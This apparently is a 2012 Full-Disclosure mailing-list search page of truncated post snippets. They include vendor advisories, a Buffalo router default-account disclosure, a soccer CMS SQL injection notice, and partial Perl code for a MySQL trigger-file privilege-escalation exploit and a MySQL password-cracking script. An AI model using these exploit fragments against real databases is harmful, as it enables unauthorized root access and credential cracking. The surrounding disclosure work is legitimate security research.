Maybe read the code???
$mysql_version = 51; # can be 51 or 50
if ($mysql_version eq 50) {
$inject =
select 'TYPE=TRIGGERS' into outfile'.$folder.$database./rootme.TRG'
LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost`
trigger atk after insert on rootme for each rownbegin
After reading l0rd lunatic's post about the Buffalo router
(http://seclists.org/fulldisclosure/2012/Nov/234), noticed that going
to login page and clicking 'help' will show you the default admin
account. I think that is what he meant about information disclosure!
It also lets you login as guest
Release Date. 5-Dec-2012
Last Update. -
Vendor Notification Date. -
Product. Linkstation Others
Platform. Buffalo Technology
Affected versions. Including Actual Version
Severity Rating. High
Impact.
Hi all,
wrote some shitcode for mysql userhash enumeration when having FILE
privilege. surely you could do it with simple bash one-liner using
mysql+grep+sed, but we're not going the easy way, right?
the first thought was hey, what about changing root password directly
in file user.MYD? but
Hello,
This year there is an advent calendar aimed at security -
http://secadvent.com
Every day for the period Dec 1 -25 a security related article will be
published on the website.
Today's article is a crypto type puzzle.
Best of luck from the Security Advent Calendar
Product: FOOT Gestion
Version: -
Vendor: Winsoft
Vendor site:http://www.footgestion.ch
Status: fixed
Level: High
=
Description
=
FOOT Gestion is a soccer team management CMS. The solution is based on a
software and a CMS website.
The website module is affected by a SQL injection
El dic 5, 2012 11:09 a.m., Paul van Bavel pvanba...@gmail.com escribió:
Where can I find the mysqlcrack.pl script.
Regards,
Paul
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted
use Net::MySQL;
$|=1;
my $mysql = Net::MySQL-new(
hostname = '192.168.2.3',
database = 'test',
user = user,
password = secret,
debug = 0,
);
$crackuser = crackme;
while(stdin) {
chomp;
$currentpass = $_;
$vv = join \0,
$crackuser,
\x14.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDVSA-2012:177
http://www.mandriva.com/security/
-BEGIN PGP SIGNED MESSAGE-
CA20121205-01: Security Notice for CA XCOM Data Transport on Unix and
Linux
Issued: December 5, 2012
CA Technologies Support is alerting customers to a potential risk with
CA XCOM Data Transport. A vulnerability exists that can allow a remote
attacker to
View online: http://drupal.org/node/1859282
* Advisory ID: DRUPAL-SA-CONTRIB-2012-173
* Project: Nodewords: D6 Meta Tags [1] (third-party module)
* Version: 6.x
* Date: 2012-December-05
* Security risk: Not critical [2]
* Exploitable from: Remote
* Vulnerability: Information
On Mon, Dec 3, 2012 at 11:03 AM, king cope
isowarez.isowarez.isowa...@googlemail.com wrote:
Yes I agree, we should discard this default remote vulnerability
because it is documented.
Devil's advocate: Does a questionable design choice/feature that is
documented make it any less vulnerable?
How
12 matches
Mail list logo